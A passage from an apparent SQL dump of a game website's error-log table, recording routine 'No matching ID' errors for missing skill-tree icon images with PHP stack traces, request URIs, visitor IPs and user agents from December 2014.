map::creatures(\'1\')\n#5 /home/web/webdir/mojotrollz/mojotrollz/api/api_mojotrollz.php(20): map::positions(\'1\', \'1\')\n#6 [internal function]: api_mojotrollz::call_positions(\'1\', \'1\')\n#7 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#8 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#9 {main}', '37.24.148.242', 0.008, '2014-12-14 18:37:46', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=positions&type=1&map=1', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (713, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_rogue_ambush.png\' found.', '131fb469813d7c0942988b3e64a834f63a0492ee', 1, '/home/mojotrolls/mojo_zero/src/web/system/files/files.php', 22, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_rogue_a...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_rogue_a...\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '87.60.112.108', 0.064, '2014-12-14 18:43:32', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=skilltree_skills&id=ability_rogue_ambush.png', 'a:0:{}', 'http://www.mojotrollz.eu/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (714, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_warrior_shieldwall.png\' found.', '20067d68c4c8fca8b9135adad8bf8a9a352354e8', 1, '/home/mojotrolls/mojo_zero/src/web/system/files/files.php', 22, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_warrior...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_warrior...\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '87.60.112.108', 0.056, '2014-12-14 18:43:33', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=skilltree_skills_grey&id=ability_warrior_shieldwall.png', 'a:0:{}', 'http://www.mojotrollz.eu/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (715, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'inv_mace_01.png\' found.', 'caae2537ac6acdd1c24fec61e25e8f7383bdc984', 1, '/home/mojotrolls/mojo_zero/src/web/system/files/files.php', 22, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'inv_mace_01.png\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'inv_mace_01.png\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '87.60.112.108', 0.056, '2014-12-14 18:43:33', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=skilltree_skills_grey&id=inv_mace_01.png', 'a:0:{}', 'http://www.mojotrollz.eu/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (716, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_warrior_decisivestrike.png\' found.', '31d350acb87bef7a102a2fe07d87a976b604a2e5', 1, '/home/mojotrolls/mojo_zero/src/web/system/files/files.php', 22, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_warrior...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_warrior...\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '87.60.112.108', 0.008, '2014-12-14 18:43:33', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=skilltree_skills_grey&id=ability_warrior_decisivestrike.png', 'a:0:{}', 'http://www.mojotrollz.eu/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (717, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_warrior_revenge.png\' found.', 'be231137ff8cb9060ee14035d3cce4e50b1389df', 1, '/home/mojotrolls/mojo_zero/src/web/system/files/files.php', 22, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_warrior...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_warrior...\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '87.60.112.108', 0.024, '2014-12-14 18:43:33', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=skilltree_skills_grey&id=ability_warrior_revenge.png', 'a:0:{}', 'http://www.mojotrollz.eu/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (718, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_searingarrow.png\' found.', '9c947d2e7d30305eb04968d8cc0e8fee9493e741', 1, '/home/mojotrolls/mojo_zero/src/web/system/files/files.php', 22, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_searing...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_searing...\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '87.60.112.108', 0.016, '2014-12-14 18:43:33', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=skilltree_skills_grey&id=ability_searingarrow.png', 'a:0:{}', 'http://www.mojotrollz.eu/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (719, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_warrior_sunder.png\' found.', '47d7d2088191c8213d92b63c4ddae4bf0a9862ba', 1, '/home/mojotrolls/mojo_zero/src/web/system/files/files.php', 22, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_warrior...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_warrior...\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '87.60.112.108', 0.02, '2014-12-14 18:43:33', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=skilltree_skills_grey&id=ability_warrior_sunder.png', 'a:0:{}', 'http://www.mojotrollz.eu/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (720, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'inv_sword_05.png\' found.', '9541b8f07bb3201d1debfaa274eee93e1a229b35', 1, '/home/mojotrolls/mojo_zero/src/web/system/files/files.php', 22, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'inv_sword_05.pn...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'inv_sword_05.pn...\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '87.60.112.108', 0.012, '2014-12-14 18:43:33', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=skilltree_skills_grey&id=inv_sword_05.png', 'a:0:{}', 'http://www.mojotrollz.eu/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (721, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_backstab.png\' found.', 'f3c968d6d61ef387c40200733800adac03f0b9c9', 1, '/home/mojotrolls/mojo_zero/src/web/system/files/files.php', 22, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_backsta...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_backsta...\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '87.60.112.108', 0.004, '2014-12-14 18:43:33', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=skilltree_skills_grey&id=ability_backstab.png', 'a:0:{}', 'http://www.mojotrollz.eu/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (722, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_warrior_battleshout.png\' found.', 'a0a86ec1b1846d50504701838d6d773423aeda51', 1, '/home/mojotrolls/mojo_zero/src/web/system/files/files.php', 22, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_warrior...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_warrior...\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '87.60.112.108', 0.008, '2014-12-14 18:43:33', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=skilltree_skills_grey&id=ability_warrior_battleshout.png', 'a:0:{}', 'http://www.mojotrollz.eu/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (723, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_nature_reincarnation.png\' found.', '753cb42c5cc436893ed0e57d7b6e883f73fe1985', 1, '/home/mojotrolls/mojo_zero/src/web/system/files/files.php', 22, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_nature_re...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_nature_re...\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '87.60.112.108', 0.012, '2014-12-14 18:43:33', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=skilltree_skills_grey&id=spell_nature_reincarnation.png', 'a:0:{}', 'http://www.mojotrollz.eu/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (724, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'inv_sword_27.png\' found.', 'bfdfe08b5df2b79da7fce769e894d205a16e2cd6', 1, '/home/mojotrolls/mojo_zero/src/web/system/files/files.php', 22, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'inv_sword_27.pn...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'inv_sword_27.pn...\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '87.60.112.108', 0.17201, '2014-12-14 18:43:33', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=skilltree_skills_grey&id=inv_sword_27.png', 'a:0:{}', 'http://www.mojotrollz.eu/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (725, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_defend.png\' found.', 'e71ce15b7d6a8b50d5878bbdc9243aed01b8d072', 1, '/home/mojotrolls/mojo_zero/src/web/system/files/files.php', 22, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_defend....\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_defend....\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '87.60.112.108', 0.16401, '2014-12-14 18:43:33', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=skilltree_skills_grey&id=ability_defend.png', 'a:0:{}', 'http://www.mojotrollz.eu/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (726, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'inv_sword_48.png\' found.', '056e5f7064f8a032978bba634c264ba2f820bd26', 1, '/home/mojotrolls/mojo_zero/src/web/system/files/files.php', 22, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'inv_sword_48.pn...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'inv_sword_48.pn...\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '87.60.112.108', 0.132, '2014-12-14 18:43:33', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=skilltree_skills_grey&id=inv_sword_48.png', 'a:0:{}', 'http://www.mojotrollz.eu/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (727, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_warrior_cleave.png\' found.', '89f90652e5f0e2a61f791d70944d775eef592a93', 1, '/home/mojotrolls/mojo_zero/src/web/system/files/files.php', 22, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_warrior...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_warrior...\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '87.60.112.108', 0.1, '2014-12-14 18:43:33', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=skilltree_skills_grey&id=ability_warrior_cleave.png', 'a:0:{}', 'http://www.mojotrollz.eu/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (728, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_shadow_unholyfrenzy.png\' found.', '21b390a21da649c20f86cbcdb8c174aecfbcdef0', 1, '/home/mojotrolls/mojo_zero/src/web/system/files/files.php', 22, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_shadow_un...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_shadow_un...\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '87.60.112.108', 0.008, '2014-12-14 18:43:33', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=skilltree_skills_grey&id=spell_shadow_unholyfrenzy.png', 'a:0:{}', 'http://www.mojotrollz.eu/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (729, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_magic_magearmor.png\' found.', 'c9b9b3ee9930ba10613e37cb6b4a778499e58195', 1, '/home/mojotrolls/mojo_zero/src/web/system/files/files.php', 22, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_magic_mag...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_magic_mag...\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '87.60.112.108', 0.008, '2014-12-14 18:43:33', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=skilltree_skills_grey&id=spell_magic_magearmor.png', 'a:0:{}', 'http://www.mojotrollz.eu/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (730, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_warrior_charge.png\' found.', '5849b438cf67cbb37f6d228593e36ce771398cef', 1, '/home/mojotrolls/mojo_zero/src/web/system/files/files.php', 22, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_warrior...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_warrior...\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '87.60.112.108', 0.008, '2014-12-14 18:43:33', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=skilltree_skills_grey&id=ability_warrior_charge.png', 'a:0:{}', 'http://www.mojotrollz.eu/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (731, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_gouge.png\' found.', 'b9e024f1e52cea3113d330d1ff959e9aeef8e462', 1, '/home/mojotrolls/mojo_zero/src/web/system/files/files.php', 22, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_gouge.p...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_gouge.p...\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '87.60.112.108', 0.028, '2014-12-14 18:43:33', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=skilltree_skills&id=ability_gouge.png', 'a:0:{}', 'http://www.mojotrollz.eu/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (732, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_holy_devotion.png\' found.', '7410050edd7ba4a331ca6648ca8fc924c27770cb', 1, '/home/mojotrolls/mojo_zero/src/web/system/files/files.php', 22, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_holy_devo...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_holy_devo...\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 